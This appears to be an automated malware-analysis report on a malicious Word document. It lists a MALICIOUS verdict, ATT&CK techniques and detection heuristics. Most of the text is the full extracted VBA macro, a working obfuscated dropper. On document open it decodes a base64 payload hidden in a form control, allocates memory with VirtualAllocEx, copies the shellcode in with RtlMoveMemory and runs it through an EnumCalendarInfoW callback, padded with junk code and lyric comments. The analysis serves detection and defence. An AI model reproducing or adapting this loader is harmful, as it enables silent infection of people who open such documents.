Verdict: MALICIOUS (risk score 190)
Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro with a Document_Open auto-execution routine. Heuristics indicate the use of VirtualAlloc and GetObject, suggesting memory allocation and object manipulation for payload execution. The ClamAV detection name 'Doc.Dropper.Agent-1820965' strongly implies dropper functionality, where the macro likely downloads and executes a secondary payload. No specific family could be identified, but the behaviour is consistent with a macro-based downloader.
Heuristics (7)

- ClamAV: Doc.Dropper.Agent-1820965 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-1820965
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call. Matched line in script: `Set wdApp = GetObject(, "Word.Application")`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro (low, OLE_VBA_DOCOPEN): Document_Open macro. Matched line in script: `Private Sub Document_Open() Dim harmony As Long`
- Reference to VirtualAlloc API (medium, SC_STR_VIRTUALALLOC): Reference to VirtualAlloc API
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All of the following were found in document text (OLE body):
  - http://ns.adobe.com/xap/1.0/
  - http://www.w3.org/1999/02/22-rdf-syntax-ns#
  - http://purl.org/dc/elements/1.1/
  - http://ns.adobe.com/xap/1.0/mm/
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent#
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef#
  - http://ns.adobe.com/camera-raw-settings/1.0/
  - http://ns.adobe.com/photoshop/1.0/
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12521 bytes | 426b37a9119a79d46fd789aa516c632213ba43969f50c7d70546f32db2601930 |
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub upper()
Dim InitialCaps As Range
Set InitialCaps = ActiveDocument.Range(Start:=ActiveDocument.Words(1).Start, _
End:=ActiveDocument.Words(3).End)
InitialCaps.Case = wdUpperCase
End Sub
Private Sub Document_Open()
Dim harmony As Long
Dim adlumia As Integer
freeway = "concordiam"
obsessivecompulsive = LCase$("MaN") & Right$("athensufacture", 8)
postal
clutter = 75
carboy = 93
If clutter + carboy < 10 Then
clutter = LCase$("cAse") & LCase$("HARDEN") & Mid("scorpionidaedsharping", 12, 2)
subscribed = subscribed
entellus = Right$("beastsbo", 2) & LCase$("oKcA") & LCase$("SE")
Else
nestling = nestling / 252
carboy = 88
End If
End Sub
Function halfadozen(eaglet)
Dim cotta As Variant
Dim sempiternal As Variant
Dim costerman As Long
formalin costerman, ByVal VarPtr(eaglet) + 8, 4
Dim roan As String
Dim vibration As Integer
Dim catabiosis As Long
intervallo = 0
outgate = -1
decrepit = 126 + 35 + 71 - 232
circumgyration = Abs(82.382)
mini = "amulet"
admiring = 4096
twothirds = cortically(ByVal outgate, ByVal decrepit, 7382, admiring, 64)
circumgyration = Int(225.87)
formalin catabiosis, ByVal VarPtr(twothirds) + 8, 4
circumgyration = Round(379.1297)
formalin ByVal catabiosis, ByVal costerman, 5538
slot = 9
While slot < 14
slot = slot + 1
subscribed = mini
nestling = Int(454.1064)
Wend
halfadozen = catabiosis
End Function
Sub postal()
Dim account As String
Dim gorge As Byte
Set butcherbird = stilted.nothofagus.BoundValue("Tab2")
wobble = butcherbird.ControlTipText
hereinafter = 126 + 7242
doggedness = Right(wobble, hereinafter)
basidiomycota = arado.hunc(doggedness)
gansu = 94
chorus = 62
If gansu + chorus < 30 Then
gansu = Right$("conspicioussen", 3) & Right$("asphyxiatesualism", 7)
mini = "tringa"
cavaliere = LCase$("Mu") & Left("sefulindisposed", 5)
Else
subscribed = mini
chorus = 17
End If
homegrown = "consul"
grapple = Right$("searchint", 3) & Mid("catkinertidinside", 7, 5) & Right$("bewareal", 2)
#If VBA6 And Win64 Then
Dim alps As String
Dim bead As arcturus
Dim germanspeaking As LongPtr
bead.elseifstatement = 119 + 60 - 179
Dim cameroon As Integer
#Else
Dim loathe As Integer
bead = 0
Dim defatigation As Long
Dim germanspeaking As Long
#End If
marblewood = 0
drumlin = "swollen"
topping = 94 - 60 + 4062
adventurousness = 8
While adventurousness < 12
adventurousness = adventurousness + 1
mini = mini
mini = subscribed
Wend
amsinckia = "shocking"
princesfeather = "curvilinear"
apothecaries = "reinstate"
hurlyburly = 8
While hurlyburly < 11
hurlyburly = hurlyburly + 1
circumgyration = nestling / 265
circumgyration = Round(291.843)
Wend
dimly = basidiomycota
snowdrift = "dracocephalum"
germanspeaking = halfadozen(dimly)
driblets = Mid("anthropophagouscoupitprop", 16, 3) & UCase$("nTERC") & UCase$("Heck")
einstein = "hyperglycemia"
#If VBA6 And Win64 Then
Dim stultiloquy As Variant
grassy = "pining"
efflorescence = "meaningless"
direction = "scatterbrained"
expressions = 37 + 66 - 42 + 1219
#ElseIf Win32 Then
diligent = "phonics"
pegology = "fesse"
diastrophism = 21 + 485
expressions = diastrophism + 3171
#End If
Dim fief As Variant
Dim akee As String
Dim smallscale As Long
smallscale = 2048
Dim letun As Long
letun = germanspeaking + expressions
Dim manufactory As Long
manufactory = 1
ajar = coward(letun, smallscale, manufactory, manufactory)
For lilliput = 37 To 57
suturing = 57
subscribed = subscribed
tensiometer = Left("brafflatus", 2) & UCase$("EATh")
tensiometer = UCase$("aL") & Mid("electroencephalogramtarmaisonnette", 21, 3)
Next lilliput
End Sub
Attribute VB_Name = "arado"
'I hope that I don't bore you while I whine about it
#If VBA6 And Win64 Then
'so if it all fails just throw it back in my face and bury me
Public Type arcturus
'as soon as I escape there's more stagnant bullsshit
elseifstatement As LongPtr
'I hope you won't be saddened while I cry about it
End Type
'I keep telling myself that there's something more
Public Declare PtrSafe Function atriplex Lib "user32" Alias "SetParent" (ByVal accountantship As LongPtr, ByVal bellwort As LongPtr,toots As LongPtr) As LongPtr
'I'd like to think there's more something more
Public Declare PtrSafe Function extroverted Lib "user32" Alias "GetUpdateRect" (hylactophryne As LongPtr, diapensiales As LongPtr,pine As LongPtr) As Boolean
'I hope that I don't bore you while I whine about it
Public Declare PtrSafe Function coward Lib "kernel32" Alias "EnumCalendarInfoW" (ByVal occidental As Any, ByVal jottings As Any, ByVal rove As Any, ByVal impassible As Any) As LongPtr
'I can't watch things further complicate
Public Declare PtrSafe Sub formalin Lib "ntdll.dll" Alias "RtlMoveMemory" (precedent As Any, guardhouse As Any, ByVal notification As LongPtr)
'I'd like to think there's more something more
Public Declare PtrSafe Function absentmindedness Lib "user32" Alias "EndPaint" (albification As LongPtr,mediate As LongPtr) As LongPtr
'I'm lost in this place it's such a waste
Public Declare PtrSafe Function cortically Lib "kernel32" Alias "VirtualAllocEx" (biennial As LongPtr, iberomesornis As LongPtr, ByVal illicitness As LongPtr, ByVal midon As LongPtr, ByVal incontinence As LongPtr) As LongPtr
'on focusing destractions tear me open
Public Declare PtrSafe Function namtar Lib "kernel32" Alias "Sleep" (etymology As LongPtr)
'I keep telling myself that there's something more
Public Declare PtrSafe Function ladder Lib "user32" Alias "OpenClipboard" (alike As LongPtr) As Boolean
'Everyday I wake up to stagnant bullshit
'I hope you won't be saddened while I cry about it
#Else
'I hope you won't be saddened while I cry about it
Public Declare Function french Lib "user32" Alias "EndPaint" (nidicolous As Long, sapsago As Long) As Long
'so if it all fails just throw it back in my face and bury me
Public Declare Sub formalin Lib "ntdll.dll" Alias "RtlMoveMemory" (bruder As Any, obreptitious As Any, ByVal ballad As Long)
'have mercy please God erase us
Public Declare Function coward Lib "kernel32" Alias "EnumCalendarInfoW" (ByVal cymbid As Any, ByVal ambiversion As Any, ByVal mineralized As Any, ByVal flood As Any) As Long
'so if it all fails just throw it back in my face and bury me
Public Declare Function diabetic Lib "user32" Alias "GetUpdateRect" (omnifarious As Long, droves As Long, chitchat As Long) As Boolean
'so if it all fails just throw it back in my face and bury me
Public Declare Function cortically Lib "kernel32" Alias "VirtualAllocEx" (anthologist As Long, calloused As Long, ByVal capillarity As Long, ByVal drapery As Long, ByVal chromosomal As Long) As Long
'all the thoughts in my head are constantly .. haunting me
Public Declare Function abc Lib "user32" Alias "OpenClipboard" (telegraphic As Long) As Boolean
'I'd like to think there's more something more
Public Declare Function motacilla Lib "user32" Alias "SetParent" (ByVal surrejoinder As Long, ByVal unaffected As Long, flimsily As Long) As Long
'I hope you won't be saddened while I cry about it
Public Declare Function brosmius Lib "kernel32" Alias "Sleep" (adjuvat As Long)
'I'm lost in this place it's such a waste
'I can't watch things further complicate
#End If
'so if it all fails just throw it back in my face and bury me
Function macleaya(facilitative, discredited)
macleaya = facilitative * discredited
End Function
Function isohel(fervor)
isohel = AscW(fervor)
End Function
Function incidentally(dicto, bos)
incidentally = dicto \ bos
End Function
Function annoyed(dabble, pisiform)
annoyed = dabble And pisiform
End Function
Function hunc(opportune) As String
circumgyration = circumgyration * 3
Dim despise(63) As Long
Dim abstinence(63) As Long
mini = "both"
Dim engorge() As Byte
Dim anaplasmosis(5525) As Byte
Dim whether(63) As Long
Dim stub As Long
Dim seines As Integer
Dim chalks(255) As Byte
Dim benzofuran As Long
Dim fearfully As Integer
Dim muove As String
Dim proturberance As Long
Dim weakkneed As Long
Dim tellurium As String
Dim eighteen As String
cemented = 53 + 70 + 3973
etat = 44 + 65236
Dim grip As String
Dim circumjacent As Long
highwayman = 16711680
dominantly = 123 - 11 + 143
streptolysin = 92 + 65444
marguerite = 126 - 62
agriculture = 63
cooperation = 262144
anachronism = 115 - 23 + 257956
Dim cimabue As Byte
tierce = 1 + 4031
adsorbed = 81 + 16514991
cacophony = 101 - 25 + 180
Dim favillous As Integer
Dim inguishable(7367) As Byte
curtained = 109 + 40 - 75 + 7294
For jaws = 1 To curtained
footlocker = Mid(opportune, jaws, 1)
tlingit = "chemiluminescence"
towhee = "design"
tensimeter = "amity"
alumina = isohel(footlocker)
inguishable(jaws - 1) = alumina
Next
Dim stratus As Long
wire = 79
nondiscrimination = 54
If wire + nondiscrimination < 15 Then
wire = LCase$("bA") & "rbec" & Right$("austromancyued", 3)
subscribed = mini
hectic = UCase$("wa") & Right$("apliterder", 4)
Else
circumgyration = Round(80.334)
nondiscrimination = 86
End If
danaea = 7367
brocaded = 35
For apt = 0 To danaea
inguishable(apt) = inguishable(apt) + 5
Next apt
cloudliness = 85
catching = 51
If cloudliness + catching < 32 Then
cloudliness = "me" & Mid("boundlessurtcuckoldom", 10, 3)
mini = "egotism"
amethyst = Right$("landgravebro", 3) & "nchos" & Left("pasmgly", 4)
Else
circumgyration = circumgyration And 422
catching = 101
End If
fearfully = 0
deific = 64 + 117 - 59
aftereffect = 255
For stub = 0 To aftereffect
If (stub >= 65) And (stub <= 90) Then
chalks(stub) = stub - 65
ElseIf (stub >= 97) And (stub <= 122) Then
chalks(stub) = stub - 71
ElseIf (stub >= 48) And (stub <= 57) Then
chalks(stub) = stub + 4
ElseIf stub = 43 Then
chalks(stub) = 62
ElseIf stub = 47 Then
chalks(stub) = 63
End If
Next stub
For stub = 0 To 63
despise(stub) = macleaya(stub, marguerite)
whether(stub) = macleaya(stub, cemented)
abstinence(stub) = macleaya(stub, cooperation)
Next stub
For bargaining = 30 To 61
astriction = 61
nestling = Fix(213.1021)
uti = UCase$("gaR") & Right$("inexorableambulla", 7)
uti = UCase$("DE") & UCase$("lIcTo")
Next bargaining
engorge = inguishable
aristarchy = 4
goasyouplease = 50
brotulidae = 74
If goasyouplease + brotulidae < 23 Then
goasyouplease = LCase$("de") & Right$("duckscolon", 5) & LCase$("IZATIOn")
circumgyration = Fix(469.712)
circumnavigate = LCase$("bA") & LCase$("RKeE") & UCase$("per")
Else
circumgyration = Fix(189.837)
brotulidae = 55
End If
divinities = 3
subscribed = mini
circumgyration = Round(462.418)
bichona = divinities + 1
painim = 113 + 101 - 212
For weakkneed = 0 To danaea
miraculous = engorge(weakkneed)
unoriginal = engorge(weakkneed + 2)
benzofuran = abstinence(chalks(miraculous)) _
+ whether(chalks(engorge(weakkneed + 1))) + despise(chalks(unoriginal)) + chalks(engorge(weakkneed + divinities))
stub = annoyed(benzofuran, highwayman)
anaplasmosis(proturberance) = incidentally(stub, streptolysin)
stub = annoyed(benzofuran, etat)
anaplasmosis(proturberance + 1) = incidentally(stub, cacophony)
anaplasmosis(proturberance + painim) = annoyed(benzofuran, dominantly)
proturberance = proturberance + painim + 1
weakkneed = weakkneed + 3
Next
hunc = anaplasmosis
End Function
Sub SelectSentence()
Dim wdApp As Word.Application
Dim wdRng As Word.Range
Set wdApp = GetObject(, "Word.Application")
With wdApp.ActiveDocument
If .Paragraphs.Count >= 3 Then
Set wdRng = .Paragraphs(3).Range
wdRng.Copy
End If
End With
Worksheets("Sheet2").PasteSpecial
Worksheets("Sheet2").Paste Destination:=Worksheets("Sheet2").Range("A1")
Set wdApp = Nothing
Set wdRng = Nothing
End Sub
Attribute VB_Name = "stilted"
Attribute VB_Base = "0{41F33EDB-7F26-4FE8-904E-14EDAF37791B}{3F8CCC1E-8E9B-4E9E-82A7-D367D9AD41E2}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False